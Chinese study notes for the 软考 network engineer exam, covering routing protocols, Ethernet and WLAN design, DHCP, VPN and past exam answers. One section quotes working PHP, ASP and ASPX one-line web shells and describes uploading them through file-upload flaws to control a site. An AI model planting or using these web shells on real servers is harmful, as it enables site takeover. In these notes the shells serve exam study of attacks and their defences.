【软考】真题问题及复习笔记记录

———- 复习笔记 ———-

复习笔记 20230516(二)

路由协议

RIP udp 520
OSPF ip
ISIS 链路层
BGP tcp 179

ospf和isis 链路状态协议

ospf使用hello报文维持邻居关系
isis也使用hello协议寻找毗邻节点

———- 上午题 ———-

2019年5月上午题 20230513(六) 65/75

2019年11月上午题 20230515(一) 59/75

06
一般情况下属于职务作品，按国家著作权法规定，应属于单位所有。但如果与单位事先有特别约定，应遵从约定

07
软件开发者拥有署名权，其他著作权归属单位

08
在磁盘调度管理中，应先进行移臂调度，再进行旋转调度。 ？？？

12
传统以太网使用的是曼彻斯特编码，效率50%

13 14
HFC是将光缆敷设到小区，然后通过光电转换结点，利用有线电视CATV的总线式同轴电缆连接到用户，提供综合电信业务的技术。

15 千兆以太网
(1)1000 Base-T标准使用的是5类非屏蔽双绞线，双绞线长度可以达到100m。
(2)1000Base-X是基于光纤通道的物理层，使用的媒体有三种：
1000 Base-CX标准使用的是屏蔽双绞线，双绞线长度可以达到25m；
1000 Base-LX标准使用的是波长为1300nm的单模光纤，光纤长度可以达到3 000m；
1000 Base-SX标准使用的是波长为850nm的多模光纤，光纤长度可以达到300～550m。
其中前三项标准是IEEE 802.3z，而1000 Base-T的标准是IEEE 802.3ab。

16 CRC
在原始报文的后面添加若干个0 (生成多项式的最高次幂数 最终校验位的位数)

17 CSMA/CD
在以太网中为了确保发送数据站点在传输时能检测到可能存在的冲突，数据帧的传输时延要不小于两倍的传播时延。
$$\displaystyle 传输时延 \geq 2\times\frac{任意两点间的最长距离}{信号传播速度}$$

19 20 HDLC
_HDLC_（High-Level Data Link Control，高级数据链路控制）
HDLC有三种不同类型的帧：信息帧(I帧)、监控帧(S帧)和无编号帧(U帧)。
信息帧用于传送用户数据、通常简称Ｉ帧。
监控帧用来差错控制和流量控制，
无编号帧用于提供对链路的建立、拆除以及多种控制功能。

21
发送方的拥塞窗口cwnd

26
OSPF报文封装在IP包中，协议号89

29
1、我向浏览器中输入网址后，浏览器会效验网址的合法性，如果网址不合法，会传给默认的搜索引擎。
如果网址合法并通过验证，浏览器会，得到协议(http或https)，域名，资源页面(比如首面等)
2、DNS查询
浏览器会先检查域名信息是否在缓存中。
再检查域名是否在本地的Hosts文件中。
如果还不在，那么浏览器会向DNS服务器发送一个查询请求，获得目标服务器的IP地址。
3、TCP封包及传输
4、建立TCP连接后发起HTTP请求 ？？？？
5、服务器接收请求并相应

33
关闭防火墙的方法为：

1. 永久性生效
   开启：chkconfig iptables on
   关闭：chkconfig iptables off
2. 即时生效，重启后失效
   开启：service iptables start
   关闭：service iptables stop

34
IIS（Internet Information Server，互联网信息服务）是一种Web（网页）服务组件

• DHCP服务器
• DNS 服务器
• 传真服务器
• Web服务器(IIS)
  - Web服务器 网页浏览
  - FTP服务器 文件传输
  - NNTP服务器 新闻服务
  - SMTP服务器 邮件发送

36
DHCP服务可以服务于一个网段，也可以通过DHCP中继服务多个子网，在一个网段中可以配置多台DHCP服务器。
客户端要使用DHCP服务不需指定DHCP服务器地址，是通过广播方式寻找

41
公开密钥加密，也叫非对称加密，加密用到两个密钥，其中公开的是公钥，未公开的是私钥，一个用来加密，另一个用来解密。常见的非对称加密算法有RSA、ElGamal、DSA、ECC（椭圆曲线加密算法背包算法）等。
对称加密只用一个密钥，既做加密又做解密。常见的对称加密算法有：DES、AES、3DES、Blowfish等。

58
通常情况下，信息插座的安装位置距离地面的高度为( )cm 30-50
一般30cm，可以回忆下家里网线口高度是多少

61
选根网桥那个题，有歧义

62
RIPv1 RIPv2 有类不携带子网掩码 无类携带子网掩码 不支持VLSM、CIDR 支持VLSM、CIDR 没有认证功能 提供明文和MD5认证 广播更新 组播更新(广播也支持) 周期性更新30s 采用触发更新

66
固态硬盘没有IDE接口的，常见的有：SATA、PCIe和M.2。

2022年5月上午题

———- 下午题 ———-

2019年11月下午题 20230516(二)

第1题 ip地址相关 14/20

第2题

实现无线网络统一管理和漫游的设备，是无线控制器 AC
实现用户登录认证的设备是无线认证系统（可能是软件或硬件）
实现无线AP接入和供电的设备是POE交换机
实现高密度优化后接入的设备为高密吸顶式AP
看到X86线盒，就是面板上AP
其他设备：防火墙、IDS/IPS、WAF、数据库审计、FC、交换机

实现网络隔离技术的技术有VLAN和ACL，如果是ACL，一版会说访问控制
实现审计和控制，阻止并记录非法访问，即上网行为管理设备

存储网络包含IP-SAN和FC-SAN。如果是FC-SAN，服务器一版会配置两块网卡，一张连接FC，一张连接以太网。
FC fiber channel 光纤通道

2020年11月下午题 20230520(六)

问题1

1.组播报文对无线网络空口的影响主要有(14) ，随着业务数据转发的方式不同, 组播报文的抑制分别 在 (15)、(16) 配置。
(14)无线空口拥塞 (15)直连 AP 的交换机接口 (16) AC 的流量模板下

组播报文在 无线空口没有 ACK 机制保障，为了纯组播报文能够稳定发送，通常对组播进行限速，或叫组播报文抑 制。直接转发时，会在 AP 直连交换机接口上配置，隧道转发时，在 AC 的流量模板下配置组播报文抑 制。

2.该网络 AP 部署在每一间宿舍的原因是（17）
(17)信号穿墙会有较大衰减，导致宿舍内信号差，故直接将 AP 部署在每个房间。

问题2

1 网络故障

ping 127.0.0.1 不通，表示无法访问自己的环回地址，一般都是网卡驱动没有正确安装或 网卡 TCP/IP 协议故障。
能登录互联网即时聊天软件，但无法打开网页，是域名解析的问题，选择 DNS 配置错误。

2 一句话木马

先来看看最简单的一句话木马：

<?php @eval($_POST['attack']);?>

【基本原理】利用文件上传漏洞，往目标网站中上传一句话木马，然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。@表示后面即使执行错误，也不报错。eval（）函数表示括号内的语句字符串什么的全都当做代码执行。$_POST[‘attack’]表示从页面中获得attack这个参数值。

常见的一句话木马：

php的一句话木马： <?php @eval($_POST['pass']);?>
asp的一句话是：   <%eval request ("pass")%>
aspx的一句话是：  <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

3 攻击措施

针对上述攻击，应该采取 （6） 等措施进行防范。
部署防病毒网关或防垃圾邮件系统，启动应用层病毒过滤

4 SAN

存储区域网络(Storage Area Network,简称 SAN)可分为（7）、（8）两种， 从部署成本和传输效率两个方面比 较这两种 SAN，比较结果为（9）。
（7）FC-SAN （8）IP-SAN （9）FC-SAN 部署成本高，传输效率较高

5 raid2.0

raid2.0技术的优势
1、自动负载均衡，降低了存储系统整体故障率
2、快速精简重构，降低了双盘失效率和数据丢失的风险
3、故障自检自愈，保证了系统可靠性
4、虚拟池化设计，降低存储规划管理难度

问题3 IPSec VPN

校本部与分校之间搭建了 IPSec VPN。IPSec 的功能可以划分为认证头 AH、封装安全负 荷 ESP 以及密钥交换 IKE。其中用于数据完整性认证和数据源认证的是（1）
AH 用于完整性和数据源认证，ESP 用于加密。

问题4 vlan

划分 VLAN 的方式有：基于接口、基于 MAC 地址、基于子网、基于协议、基于策略

2021年5月下午题 20230522(一)

问题1

VRRP技术实现网关冗余功能，两个交换机之间的线称为心跳线，作用是检测VRRP组的状态，出现故障及时切换

问题2

保障数据安全可以使用VPN隧道，并进行加密传输，常用的是IPSec协议配合ESP进行加密。
出口带宽有限，可以增量备份，每次只备份增加的内容，能有效减少备份容量，提升备份速度。

问题3

802.1x 主要在接入交换机上配置，题目中提到由接入交换机 S1 拦截用户流量，则是 802.1x。
如果是 web 认证，由防火墙/行为管理设备 /认证网关等设备进行认证处理
如果是 PPPOE 认证，是由 BRAS/BAS 设备进行处理
如果是短信认证，需要有短信猫/短信网关。

学校和企业采用 802.1x 认证较多
家庭宽带/中小型企业采用 PPPOE
商超、车站等公共场所一般采用 Web/portal 或短信认证。

问题4

POE 有两种方式：
第一种：8 根铜芯既传数据，同时进行供电，两者使用不同频率；
第二种：使用 1236 进行数据传输，4578 进行供电，其中 45 位正极，78 为负极。

2021年11月下午题 20230523(二)

问题1

1 AC部署方式 优缺点

相较于以旁路方式部署，将AC直连部署存在的问题是：
答案1 summer：设备故障会影响网络连通
答案2：存在单点故障、性能瓶颈
(老师)旁路部署，如果前期配置好，后面AC挂了，是不会影响网络的

直连部署的网络设 备通常会在网络的主干线路上，这种部署方式存在单点故障的问题，同时也可 能因为设备本身的性能达不到网络传输的要求，出现性能瓶颈。所以相当一部 分支持直连部署的设备都有设备故障时，网络数据能直通的功能。

相较于部署在核心层，将AC部署在接入层存在的问题是：
答案1 summer：存在性能瓶颈
答案2 软考真题：不能很好的利用 AC 的 NAT 、 HDCP 功能。性能差，稳定性不好，其他区域的工作站访问距离远，效率低
(老师)一般核心交换机有万兆接口，且性能比接入交换机好很多

如果将 AC 部署在接入层设备上，往往由于接入层设备性能较差，稳定性不 好，也不会配置冗余的电源、线路等提升可靠性的条件。将 AC 部署在这种设备 上，可能会因为接入层设备本身的不可靠，导致无线网络瘫痪。另外，将 AC 接 在接入层设备上，也不能很好的利用 AC 本身的 NAT 和其他一些功能。并且，其 他区域的接入层工作站需要通过核心，再连接到接入层，再到 AC ，访问的路径 比较远，效率较低。

2 认证

PPPoE认证 ADSL 光纤
Portal Web
IEEE 802.1x 企业级，需要安装客户端，安全性较高

“使用 web 页面进行认证后上网”可以知道这是一 种基于 webportal 的认证方式，这种方式最大的特点是不需要安装客户端，直 接使用浏览器访问网络之前，会强制定位到 web 认证页面。

3 供电

在网络规划中，对AP供电方式可以采用POE供电或DC电源适配器供电

问题2

防火墙的工作模式：
透明模式：二层 不用配IP地址
路由模式：接口配ip地址
混合模式：有些接口配ip地址，有些接口不配

问题4

新加入网络的主机需要通过 DHCP 方式获取 IP 地址，但是，在申请到合法的 IP 地址前，主机只能采用源 IP 地址 0.0.0.0 进行临时通信。

该主机发送的 DHCP 报文无法通过基于子网划分 VLAN 的方式加入任何 VLAN ，最终设备会给该报文会打上接口的缺省 VLAN ID(缺省情况下，接口的缺省 VLAN ID 为 1)。

2022年5月下午题 20230525(四)

BGP

rip ospf

从算法原理、适用范围、功能特性三个方面简述 RIP 和 OSPF 的区别。

———- 课件相关案例题 ———-

常用的DDos攻击防范方法

MAC-flooding解决方案

接口和MAC静态绑定
限制接口MAC地址学习数量

冗余